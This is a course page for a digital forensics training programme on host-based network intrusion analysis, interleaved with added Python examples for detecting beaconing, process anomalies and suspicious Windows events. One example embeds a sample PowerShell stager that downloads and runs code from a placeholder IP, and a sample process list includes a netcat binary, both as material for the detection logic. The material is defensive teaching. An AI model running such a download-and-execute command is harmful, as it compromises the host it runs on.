Host Based Network Forensic Analysis
5 Days – 40Hrs
Cost: $2,995
Participants will receive
5 Days of Instruction
Course Manual
Practical Files
Attendance Certificate
Anna Truss
Lead Developer
Anna Truss is a highly skilled and respected professional in the field of digital forensics. With extensive experience as a forensic practitioner and trainer, Anna has made significant contributions to the examination and analysis of digital data.
She also teaches cyber security, web development and scripting courses at several colleges in the USA and serves as a senior course developer and trainer for Spyder Forensics. Anna Truss’s commitment to her field, her unwavering attention to detail, and her passion for training others make her a prominent figure in the realm of digital forensics. Her contributions continue to have a significant impact on the field, enhancing the capabilities of investigators and ensuring justice in the digital age.
Course Objectives
The Advanced Host Based Network Forensics course offered by Spyder Forensics is an intensive week-long training program designed for experienced examiners in digital forensics. Geared towards individuals familiar with digital forensic principles, this course aims to expand their expertise in advanced network exploitation forensics using a range of third-party tools on a host system that is the victim of an attack.
Throughout the training, participants will gain unbiased knowledge and essential skills for analyzing artifacts resulting from network intrusion activities. The curriculum involves the use of standard tools and open-source applications to delve deeper into data exploration. By understanding how applications function and store data during network intrusions, attendees will acquire the expertise needed to navigate forensic challenges.
The course covers the identification, processing, understanding, and documentation of crucial forensic artifacts related to network intrusion investigations. Participants will learn to use various applications and utilities effectively. This includes capturing and analyzing network traffic, triaging live systems, and examining memory captures to pinpoint potential malware and threat artifacts. The curriculum also encompasses the analysis of Windows artifacts to uncover additional information relevant to network intrusion investigations.
Emphasizing hands-on learning, students will utilize a variety of open-source and leading forensic applications in extensive labs and exercises. By the end of the course, attendees will have acquired comprehensive skills and knowledge to conduct advanced network forensic analyses.
Primary Learning Objectives
Host Based Network Forensic Analysis - Day 1
Day 1 of the Spyder Forensics Host-Based Network Forensic Analysis course begins with an overview of the course along with an introduction to the Instructor.
The day then continues with key network concepts and why understanding them is an essential weapon in the investigator's armoury.
This module is centred on those concepts, their significance, and the reasons a working grasp of them is crucial for investigators.
It aims to impart knowledge about various requirements and concepts that affect the search and seizure of network traces.
The module employs a variety of teaching methods, including informal lectures, structured discussions, and assessed practical exercises, offering students ample chances for interaction with each other and the instructor.
- Course Outline
- Network Equipment
- VPN and Proxy Server
- Network Diagrams
- Network Logs
- Securing Network
- Firewall
- Enterprise Level Network Topology
- Enterprise Data
Instructor Led lab
In this lab, participants will learn essential skills for network security, starting with how to use a network scanner to identify devices and vulnerabilities. The session will cover the use of a VPN client and application to ensure secure connections, as well as techniques for locating router logs and creating firewall logs for traffic monitoring. Additionally, attendees will gain hands-on experience using Snort on a Windows system, including how to interpret Snort log files for effective threat analysis and incident response.
Host Based Network Forensic Analysis - Day 2
Day 2 of the course looks at the fundamentals of incident response and the creation of a response team who will respond to an incident.
During the day you will be presented with a case study and practical exercise so that you can gain an understanding of a system compromise.
Instructor Led Lab
There is no Instructor Led Lab associated with this module
This module is designed to cover the fundamentals of incident response. It begins by discussing the creation of an incident response team and outlines the typical steps involved in responding to an incident. The aim of this module is to explore various factors and concepts that are crucial for the effective handling of an incident response.
Moreover, it presents a case study of a system intrusion and incorporates a practical exercise to illustrate system compromise. The module employs a blend of teaching methods, including informal lectures, guided discussions, and hands-on exercises, enabling students to engage actively both with their peers and the instructor.
- Planning Incident Response
- Conducting a Response
- Attacker Methodologies
Host Based Network Forensic Analysis - Day 3
We continue the course by looking at internet traffic, how and why data packets are scrutinised, the crucial role that monitoring plays in detecting intrusions, and understanding the methods used by adversaries.
Instructor Led Lab
In this lab, participants will be introduced to Wireshark, a powerful tool for network analysis. The session will cover the basics of capturing packets on a system, as well as techniques for adding columns and filtering packets to streamline analysis. Attendees will learn how to effectively examine packet captures, including methods to filter and search for large data transfers within the data stream. Additionally, the lab will focus on detecting and examining Command and Control (C2) traffic, providing insights into identifying potential security threats in network communications.
This module is centered on the acquisition and examination of internet traffic. Numerous organizations deploy content monitoring and management systems to ensure the security and efficiency of their internal networks. A common practice among these organizations is to scrutinize data packets as they traverse the network.
While this monitoring primarily serves to assess network health and identify networking problems, it can also play a crucial role in detecting intrusions, determining the extent of these intrusions, and understanding the methods used by adversaries.
In this module, we will cover the fundamentals of capturing data packets and how to analyze these packets to identify signs of malicious activities.
- Introduction to Network Packets and NetFlow
- Network Capture Methodology
- Examining Packet Captures
- Data Exfiltration
- Understanding Command and Control Traffic
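Two of the lab tasks above, finding large data transfers and spotting Command and Control traffic, can be reduced to checks over per-connection summaries (Wireshark's Conversations view or NetFlow records). The following is an added example, not course material or lab code: it runs over a constructed set of flow records, flags any single outbound transfer above a byte threshold, and flags connection groups whose inter-arrival times are nearly identical, the regular "beacon" pattern typical of C2 check-ins. The record layout, the 10 MB threshold and the 20% jitter limit are assumptions chosen for the sample data, not values from the course.

```python
"""Added example: flagging bulk exfiltration and C2 beaconing in flow records.

Records are constructed sample data, not a capture from the course lab:
(timestamp_seconds, src_ip, dst_ip, dst_port, bytes_sent_by_src).
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records (epoch seconds, src, dst, dport, bytes sent by src)
FLOWS = [
    # Ordinary browsing: irregular timing, small uploads
    (1000, "10.0.0.5", "93.184.216.34", 443, 1200),
    (1017, "10.0.0.5", "93.184.216.34", 443, 900),
    (1112, "10.0.0.5", "151.101.1.69", 443, 2100),
    # Beacon: roughly every 60 s to one host, small uniform payloads
    (1000, "10.0.0.7", "203.0.113.10", 443, 312),
    (1061, "10.0.0.7", "203.0.113.10", 443, 312),
    (1120, "10.0.0.7", "203.0.113.10", 443, 312),
    (1180, "10.0.0.7", "203.0.113.10", 443, 312),
    (1241, "10.0.0.7", "203.0.113.10", 443, 312),
    # Bulk exfiltration: one large outbound transfer to the same host
    (1300, "10.0.0.7", "203.0.113.10", 443, 48_000_000),
]


def large_transfers(flows, threshold_bytes=10_000_000):
    """Return (src, dst, bytes) for flows whose outbound volume meets the threshold."""
    return [(s, d, b) for (_, s, d, _, b) in flows if b >= threshold_bytes]


def beacon_candidates(flows, min_conns=4, max_jitter=0.2):
    """Group flows by (src, dst, dport) and flag groups with regular intervals.

    Regularity is measured as the coefficient of variation of the gaps between
    consecutive connections; a value near zero means near-identical spacing.
    Returns (key, mean_gap_seconds, coefficient_of_variation) per hit.
    """
    groups = defaultdict(list)
    for ts, s, d, p, _ in flows:
        groups[(s, d, p)].append(ts)
    hits = []
    for key, times in groups.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_jitter:
            hits.append((key, round(avg, 1), round(cv, 3)))
    return hits


if __name__ == "__main__":
    for hit in large_transfers(FLOWS):
        print("large transfer:", hit)
    for hit in beacon_candidates(FLOWS):
        print("beacon candidate:", hit)
```

In Wireshark the same two checks correspond to sorting the Conversations window by bytes A to B, and to applying a display filter such as `ip.addr == 203.0.113.10 && tcp.flags.syn == 1 && tcp.flags.ack == 0` and reading the time deltas between the resulting SYNs. Real beacons add deliberate jitter, so the jitter limit has to be tuned against the data rather than fixed once.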
Host Based Network Forensic Analysis - Day 4
Day 4 of the course deals with the analysis of volatile memory as well as on-scene triage of active devices. Participants will learn useful techniques such as collecting RAM with multiple tools, analysing system memory, and uncovering artifacts not yet committed to permanent storage.
This module is dedicated to the collection and analysis of volatile memory, as well as the on-scene triage of active devices. Analyzing a system’s memory is a vital step in identifying currently running processes, uncovering artifacts that have not yet been committed to permanent storage, and potentially detecting active malware within a network domain.
To facilitate a comprehensive learning experience, the module employs a variety of instructional strategies. These include informal lectures that provide foundational knowledge, guided discussions that encourage in-depth exploration of topics, and graded practical exercises that offer hands-on experience. Through these diverse teaching methods, students are given numerous opportunities to engage both with each other and with the instructor, enhancing their understanding and proficiency in volatile memory analysis.
- Triage and Memory Capture
- Memory Capture in Incident Response
- Memory Theory for Forensics and IR
- Memory Carving
- Utilizing Memory in Malware Analysis
- Volatility 3 and Analysis
Instructor Led Lab
In this lab, participants will learn how to effectively collect RAM using multiple forensic tools, setting the foundation for memory analysis. The session will introduce basic commands to analyze running processes within Volatility 3, emphasizing the use of strings, grep, and various options for enhanced analysis. Participants will explore techniques using bulk extractor, stop lists, and methods to locate critical data. Additionally, the lab will cover the use of pslist, pstree, and psscan commands, along with relevant Windows plugins for Volatility 3, equipping attendees with essential skills for memory forensics.
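Once `windows.pslist`, `windows.pstree` and `windows.psscan` have produced their listings, the next step is reading them for things that should not be there. The following is an added example, not lab code from the course: it applies three checks that examiners routinely make by hand to a constructed process listing in the (pid, ppid, name) shape those plugins print. It flags core Windows processes whose live parent is the wrong image, duplicate copies of processes that should exist once, and PIDs that the pool scan (`psscan`) finds but the linked list (`pslist`) does not. The expected-parent table covers only the well-known core processes; the sample records and PIDs are invented for the example.

```python
"""Added example: sanity checks over Volatility 3 style process listings.

Constructed sample data, not output from the course lab. Each record is
(pid, ppid, name) as windows.pslist / windows.psscan report them.
"""

# Well-known parent for core Windows processes (names compared case-insensitively)
EXPECTED_PARENT = {
    "wininit.exe": "smss.exe",
    "csrss.exe": "smss.exe",
    "services.exe": "wininit.exe",
    "lsass.exe": "wininit.exe",
    "svchost.exe": "services.exe",
}
# Processes of which a healthy system runs exactly one instance
SINGLETONS = {"lsass.exe", "services.exe", "wininit.exe"}

# Constructed pslist output (linked-list walk)
PSLIST = [
    (4, 0, "System"),
    (320, 4, "smss.exe"),
    (420, 320, "csrss.exe"),
    (500, 320, "wininit.exe"),
    (600, 500, "services.exe"),
    (620, 500, "lsass.exe"),
    (800, 600, "svchost.exe"),
    (1500, 1400, "explorer.exe"),
    (2100, 1500, "cmd.exe"),
    (2200, 2100, "svchost.exe"),   # svchost spawned by cmd.exe: suspicious
    (2300, 1500, "lsass.exe"),     # second lsass, spawned by explorer: suspicious
]
# Constructed psscan output: the pool scan also finds a process the list omits
PSSCAN = PSLIST + [(2400, 2100, "nc.exe")]


def parent_anomalies(procs):
    """Core processes whose parent is present but is not the expected image.

    An absent parent is not flagged: csrss.exe and wininit.exe normally show a
    parent PID that no longer exists because their smss.exe instance has exited.
    """
    by_pid = {pid: name for pid, _, name in procs}
    findings = []
    for pid, ppid, name in procs:
        expected = EXPECTED_PARENT.get(name.lower())
        if expected is None:
            continue
        parent = by_pid.get(ppid)
        if parent is not None and parent.lower() != expected:
            findings.append((pid, name, ppid, parent))
    return findings


def duplicate_singletons(procs):
    """Names from SINGLETONS that occur more than once."""
    counts = {}
    for _, _, name in procs:
        key = name.lower()
        counts[key] = counts.get(key, 0) + 1
    return sorted(n for n in SINGLETONS if counts.get(n, 0) > 1)


def hidden_or_exited(pslist, psscan):
    """(pid, name) pairs found by pool scanning but absent from the linked list."""
    listed = {pid for pid, _, _ in pslist}
    return [(pid, name) for pid, _, name in psscan if pid not in listed]


if __name__ == "__main__":
    print("parent anomalies:", parent_anomalies(PSLIST))
    print("duplicate singletons:", duplicate_singletons(PSLIST))
    print("psscan-only:", hidden_or_exited(PSLIST, PSSCAN))
```

A psscan-only hit is a lead, not a verdict: the scan also recovers processes that have simply terminated, so check the exit time that `windows.psscan` prints before treating the entry as unlinked by a rootkit. The same caution applies to parent checks, since process names are trivially spoofed; the image path, session and the `windows.cmdline` output settle what a suspicious entry actually is.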
Host Based Network Forensic Analysis - Day 5
Day 5, the concluding day of the course, takes a look at Windows event logs and how to analyse them. We will also look at timeline analysis and the role it plays in a digital forensic examination.
We will also look at Windows Processes and how to identify legitimate and suspicious ones.
Instructor Led Lab
In this lab, participants will learn how to analyze Windows event logs to uncover critical information about system activities. The session will cover the use of KAPE and other tools to efficiently analyze event timelines, enabling a quick assessment of system events. Attendees will learn techniques for searching evidence of malware persistence and gain skills in identifying both legitimate and suspicious processes, enhancing their ability to conduct thorough investigations and respond to potential security threats effectively.
Investigating network attacks involves numerous challenges, particularly because these attacks often span across multiple systems. Windows systems are likely to retain significant information post-attack. It’s crucial to identify and analyze this residual data to piece together the event sequence and pinpoint any nefarious activities within the network.
This process requires a clear understanding of the types of information that can be extracted and the specific locations to examine.
The module at hand is designed to equip investigators with a variety of techniques to efficiently process and understand the available data. Moreover, practical exercises are included to train agents in uncovering information pertinent to their investigations.
This module uses several instructional strategies – informal lecture, guided discussion and graded practical exercise – to provide students with multiple opportunities to interact among themselves and with the instructor.
- Windows Event Logs
- Timeline Analysis
- Malware Persistence Locations
- Windows Processes
- Windows Subsystem for Linux artifacts
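The Day 5 lab combines event-log analysis, timeline building and a search for persistence, so a single added example covers all three. It is not course or lab code: it runs a small triage pass over constructed Windows event records, shaped like rows from an EvtxECmd CSV export or a `Get-WinEvent` table, and orders the hits into a timeline. It picks out Remote Desktop logons (4624 with logon type 10), decodes PowerShell `-EncodedCommand` arguments found in 4688 process-creation events, flags 7045 service installs whose binary lives outside the Windows directory, and records 4698 scheduled-task creations, the last two being common persistence locations. The field names on the records are assumptions for the example; the event IDs and their meanings are standard Windows ones.

```python
"""Added example: triage of exported Windows event records into a timeline.

The records below are constructed for the example, not from the course.
Field names (time, channel, event_id, cmdline, ...) are assumed, chosen to
resemble an EvtxECmd CSV export; event IDs are the real Windows ones.
"""
import base64
import re
from datetime import datetime

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the length floor keeps short switches such as "-ep bypass" from matching.
ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

# A constructed encoded command, built the way PowerShell expects it (UTF-16LE)
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode()

EVENTS = [
    {"time": "2024-03-01T09:02:11", "channel": "Security", "event_id": 4624,
     "logon_type": 10, "user": "CORP\\jdoe", "src_ip": "198.51.100.23"},
    {"time": "2024-03-01T09:03:40", "channel": "Security", "event_id": 4688,
     "new_process": "C:\\Windows\\System32\\cmd.exe",
     "parent_process": "C:\\Windows\\explorer.exe", "cmdline": "cmd.exe"},
    {"time": "2024-03-01T09:04:02", "channel": "Security", "event_id": 4688,
     "new_process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_process": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _ENCODED},
    {"time": "2024-03-01T09:05:30", "channel": "System", "event_id": 7045,
     "service_name": "WinUpdSvc", "image_path": "C:\\Users\\Public\\upd.exe"},
    {"time": "2024-03-01T09:06:10", "channel": "Security", "event_id": 4698,
     "task_name": "\\Microsoft\\Windows\\Update\\Chk", "user": "CORP\\jdoe"},
    {"time": "2024-03-01T09:10:00", "channel": "Security", "event_id": 4688,
     "new_process": "C:\\Windows\\System32\\notepad.exe",
     "parent_process": "C:\\Windows\\explorer.exe", "cmdline": "notepad.exe"},
]


def decode_encoded_command(cmdline):
    """Return the plaintext behind a PowerShell -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Return (time, tag, detail) findings sorted into a timeline."""
    findings = []
    for ev in events:
        eid, ch = ev["event_id"], ev["channel"]
        if ch == "Security" and eid == 4624 and ev.get("logon_type") == 10:
            findings.append((ev["time"], "RDP logon",
                             f"{ev['user']} from {ev['src_ip']}"))
        elif ch == "Security" and eid == 4688:
            decoded = decode_encoded_command(ev.get("cmdline"))
            if decoded:
                findings.append((ev["time"], "encoded PowerShell", decoded))
        elif ch == "System" and eid == 7045:
            if not ev["image_path"].lower().startswith("c:\\windows\\"):
                findings.append((ev["time"], "service install outside Windows dir",
                                 f"{ev['service_name']} -> {ev['image_path']}"))
        elif ch == "Security" and eid == 4698:
            findings.append((ev["time"], "scheduled task created", ev["task_name"]))
    return sorted(findings, key=lambda f: datetime.fromisoformat(f[0]))


if __name__ == "__main__":
    for when, tag, detail in triage(EVENTS):
        print(when, tag, detail, sep=" | ")
```

Two audit-policy caveats decide whether this data exists at all: 4688 carries the command line only when "Include command line in process creation events" is enabled, and 4698 is written only when Other Object Access Events auditing is on. Where either is missing, the KAPE targets for Prefetch, Amcache and the Task Scheduler XML files fill the same gap from disk.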